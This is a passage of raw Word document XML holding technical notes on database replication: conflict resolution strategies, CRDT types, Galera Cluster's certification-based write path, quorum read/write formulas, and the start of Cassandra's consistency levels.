    <w:p w14:paraId="4D640799" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11844E61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  When acceptable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF91E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Metrics, counters, analytics (approximate counts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4CA994" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Social media likes, view counts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B124CC2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Any data where "current value" matters more than change history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68179EF1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6D39760A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>First-Write-Wins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50724C73" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Version numbers per row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBCA7E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  On conflict: whichever write has lower version number was "first"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC42123" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1237FBA2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Application must handle rejected writes (retry or user notification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BD2702" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5B8E3132" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Custom application-level resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79023137" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Conflict logged, application code invoked to resolve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6426F3F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  E.g.: merge both changes (banking: apply both debits, detect resulting negative balance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569C3E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058DAD8C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Most correct but highest complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747768E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Requires application to understand conflict semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9BDCE1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2575A5E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Operational Transformation (OT) / CRDTs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D69E2F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Data types designed to merge concurrent operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233D320" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29374679" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  CRDT examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48974D40" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    G-Counter: grow-only counter (merge = max per node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B5A0D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    PN-Counter: increment/decrement counter (two G-Counters, one per operation type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3AA1B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    OR-Set: set where concurrent add/remove is resolved (add wins)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665A4F54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    LWW-Element-Set: last-write-wins set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A23AA9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B12383" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Real-world use: CouchDB, Riak, collaborative editing (Google Docs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC2252" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Limitation: not all data types have natural CRDT semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD7370" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              (bank account balance is not a CRDT — negative balance is semantically invalid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10326CC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Galera Cluster (MySQL multi-primary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7982CC27" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Galera uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>synchronous certification-based replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> to prevent conflicts rather than resolving them after the fact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DEDC2C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B13BF4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Galera write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B55F3C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Transaction executes locally on one node (optimistic execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7607F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. At COMMIT: serialize transaction's write set (rows modified + their new values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C4D12" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Broadcast write set to ALL nodes via group communication (GCS — Galera Control System)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC58A2D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  4. All nodes receive write set and perform certification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752A3A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Does this write set conflict with any concurrent write set from another node?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485C5C09" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     Conflict = modifying the same primary key as a concurrent uncommitted transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43AB79" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  5. If no conflict: all nodes commit the transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31161182" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">     If conflict: one transaction is rolled back (the later one in global ordering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA65D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  6. Non-originating nodes apply the write set (no need to re-execute — just apply)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210E89B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB84872" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Certification-based vs lock-based conflict detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFF17D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Lock-based: hold locks during transaction → blocked concurrent modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA02B76" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Certification-based: optimistic execution → conflict detected at commit → one rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB05304" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696D91C0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Galera advantage: transactions execute concurrently, conflict overhead only for actual conflicts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7D4FAA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Galera limitation: high conflict rates → high rollback rate → poor performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165E93B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB11FF3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Galera limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F238ADD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  All nodes must be in same LAN (certification requires low-latency group communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21932092" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Write scalability limited: all nodes process all writes (certification traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455442D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Large transactions: write sets can be enormous (DDL, bulk updates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76254298" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  DDL is handled as Total Order Isolation (all nodes stop processing while DDL executes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E78AFAB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quorum-Based Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F7DCB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write succeeds when acknowledged by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>quorum</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (majority) of nodes. Read succeeds when reading from a quorum of nodes. Ensures at least one node participating in any read has seen the latest write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDADE54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408FF66F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Quorum formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDE9D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  N nodes total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3013E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  W nodes must acknowledge write (write quorum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E784D13" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  R nodes must respond to read (read quorum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4831A8AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34208F00" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  For strong consistency: W + R &gt; N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601AB589" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    (write quorum + read quorum overlap — at least one node seen both)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB32DFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F878B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Typical configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3AC4E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  N=3, W=2, R=2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA02735" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Write: 2 of 3 must acknowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D07ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Read: 2 of 3 must respond (return latest value among responses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F5E9B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Tolerates: 1 node failure (still have quorum with 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912CF91" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1C438" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  N=5, W=3, R=3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC16A51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Tolerates: 2 node failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06187454" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Write: 3/5 acknowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73337841" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Read: 3/5 respond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899493B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B1A66" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  N=5, W=5, R=1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18509D37" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    All nodes must acknowledge writes (strong durability, slow writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABF882" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Any node can answer reads (fast reads, no coordination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B696F8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Zero fault tolerance for writes (any node failure blocks writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8D295" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3629D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  N=5, W=1, R=5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4AFBA0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Any node accepts writes (fast writes, poor durability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A3F3C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    All nodes must respond to reads (slow reads, perfect consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB09A7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Zero fault tolerance for reads (any node failure blocks reads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E4401" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cassandra's tunable consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C3A944" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Cassandra implements quorum-based replication with per-operation consistency levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D415371" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2B09AA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replication factor (RF): how many nodes store each partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541EAEA0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  RF=3: each row stored on 3 nodes (determined by consistent hash ring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E114F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748ACDBA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Consistency levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C034419" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ONE:    Write/read satisfies with 1 node acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458195E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  TWO:    2 nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D22461" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
